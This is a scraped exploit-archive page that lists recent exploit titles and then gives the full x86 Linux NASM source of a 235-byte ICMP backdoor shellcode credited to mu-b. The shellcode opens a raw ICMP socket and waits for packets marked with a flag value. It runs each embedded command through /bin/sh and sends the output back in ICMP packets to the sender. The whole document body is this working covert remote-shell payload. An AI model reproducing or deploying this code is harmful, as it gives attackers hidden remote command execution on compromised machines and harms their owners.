477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
199 lines
No EOL
3.7 KiB
NASM
Executable file
199 lines
No EOL
3.7 KiB
NASM
Executable file
;
|
|
; Copyright (c) 2007 by <mu-b@digit-labs.org>
|
|
;
|
|
; 235-byte raw-socket ICMP/checksum shell - (x86-lnx)
|
|
; by mu-b - Nov 2006
|
|
;
|
|
; icmp with identifier __flag_byte and commands in the
|
|
; following format:-
|
|
; "/bin/sh\x00-c\x00<command here>\x00"
|
|
;
|
|
; unlike *other* icmp shells, this will reply with
|
|
; 255-(sizeof icmp_hdr) bytes of output..
|
|
;
|
|
|
|
%define zero_reg esi
|
|
%define zero_reg_w si
|
|
%define sock_reg edi
|
|
%define __flag_byte 6996h
|
|
|
|
global _shell
|
|
|
|
_shell:
|
|
xor zero_reg, zero_reg
|
|
mov ebp, esp
|
|
|
|
; sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP);
|
|
_socket:
|
|
lea ebx, [zero_reg+3]
|
|
push byte 1
|
|
push ebx
|
|
dec ebx
|
|
push ebx
|
|
dec ebx
|
|
mov ecx, esp
|
|
lea eax, [zero_reg+66h]
|
|
int 80h ; socket();
|
|
mov sock_reg, eax
|
|
|
|
; setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &1, 1);
|
|
_setsockopt:
|
|
push ebx
|
|
push esp
|
|
push byte 3h
|
|
push zero_reg
|
|
push sock_reg
|
|
mov ecx, esp
|
|
mov bl, byte 0eh
|
|
mov al, byte 66h
|
|
int 80h ; setsocketopt();
|
|
|
|
; while(1)
|
|
_while_loop:
|
|
; read(sockfd, cmd, 255);
|
|
cdq
|
|
dec byte dl
|
|
mov ecx, ebp
|
|
mov ebx, sock_reg
|
|
lea eax, [zero_reg+3]
|
|
int 80h ; read();
|
|
|
|
lea ebx, [ebp+24]
|
|
xor [ebx], word __flag_byte
|
|
jne short _while_loop
|
|
|
|
; pipe(pp)
|
|
lea ebx, [ebp-8]
|
|
mov al, byte 2ah
|
|
int 80h ; pipe();
|
|
|
|
; fork()
|
|
mov al, byte 2h
|
|
int 80h ; fork();
|
|
test eax, eax
|
|
jnz short _parent
|
|
|
|
_child:
|
|
; close(pp[0])
|
|
mov ebx, [ebp-8]
|
|
mov al, byte 6h
|
|
int 80h ; close();
|
|
|
|
; dup2(pp[1], 0); dup2(pp[1], 1); dup2(pp[1], 2);
|
|
lea ecx, [zero_reg+3]
|
|
; pp[1] == pp[0]+1
|
|
inc ebx
|
|
|
|
.1:
|
|
dec ecx
|
|
mov al, byte 3fh
|
|
int 80h ; dup2();
|
|
jnz .1
|
|
|
|
; execve(cmd + 28, {cmd + 28, cmd + 36, cmd + 39, 0}, 0);
|
|
push zero_reg
|
|
lea ebx, [ebp+39]
|
|
push ebx
|
|
sub ebx, byte 3
|
|
push ebx
|
|
sub ebx, byte 8
|
|
push ebx
|
|
mov ecx, esp
|
|
cdq
|
|
mov al, byte 0bh
|
|
int 80h ; execve();
|
|
|
|
_parent:
|
|
; close(pp[1])
|
|
mov ebx, [ebp-4]
|
|
lea eax, [zero_reg+6]
|
|
int 80h ; close();
|
|
|
|
_parent_read:
|
|
.1:
|
|
; read(pp[0], cmd, bytes_left);
|
|
; edx == 255
|
|
lea ecx, [ebp+28]
|
|
mov ebx, [ebp-8]
|
|
mov al, byte 3h
|
|
int 80h ; read();
|
|
test eax, eax
|
|
jl _while_loop
|
|
|
|
mov al, byte 6h
|
|
int 80h ; close();
|
|
|
|
.2:
|
|
; fix up ttl (optional?! make sure its high!)
|
|
; mov [ebp+8], byte 0ffh
|
|
|
|
; switch ip's
|
|
mov ecx, [ebp+12]
|
|
xchg [ebp+16], ecx
|
|
mov [ebp+12], ecx
|
|
|
|
; set icmp type to echo reply (optional?!)
|
|
;mov [ebp+20], word zero_reg_w
|
|
; zero checksum
|
|
;mov [ebp+22], word zero_reg_w
|
|
; set icmp type to echo and zero checksum
|
|
mov [ebp+20], zero_reg
|
|
|
|
lea ecx, [zero_reg+117]
|
|
lea esi, [ebp+20]
|
|
cdq
|
|
|
|
.3:
|
|
lodsw
|
|
add edx, eax
|
|
loop .3
|
|
|
|
lodsb
|
|
xor ah, ah
|
|
add eax, edx
|
|
mov esi, eax
|
|
|
|
shr eax, byte 16
|
|
movzx esi, si
|
|
add eax, esi
|
|
mov edx, eax
|
|
shr edx, byte 16
|
|
add eax, edx
|
|
not ax
|
|
|
|
; set checksum
|
|
mov [ebp+22], word ax
|
|
|
|
cdq
|
|
xor eax, eax
|
|
xor zero_reg, zero_reg
|
|
|
|
; struct sockaddr *
|
|
push zero_reg
|
|
push zero_reg
|
|
push dword [ebp+16]
|
|
push byte 2
|
|
|
|
; sendto(sockfd, cmd, 255, 0, ...);
|
|
mov ecx, esp
|
|
push byte 16
|
|
push ecx
|
|
push zero_reg
|
|
mov dl, byte 0ffh
|
|
push edx
|
|
push ebp
|
|
push sock_reg
|
|
mov ecx, esp
|
|
mov bl, 0bh
|
|
mov al, 66h
|
|
int 80h ; sendto();
|
|
|
|
cdq
|
|
mov ecx, ebp
|
|
mov ebx, zero_reg
|
|
mov al, 72h
|
|
int 80h ; wait();
|
|
|
|
jmp _while_loop
|
|
|
|
; milw0rm.com [2007-04-02] |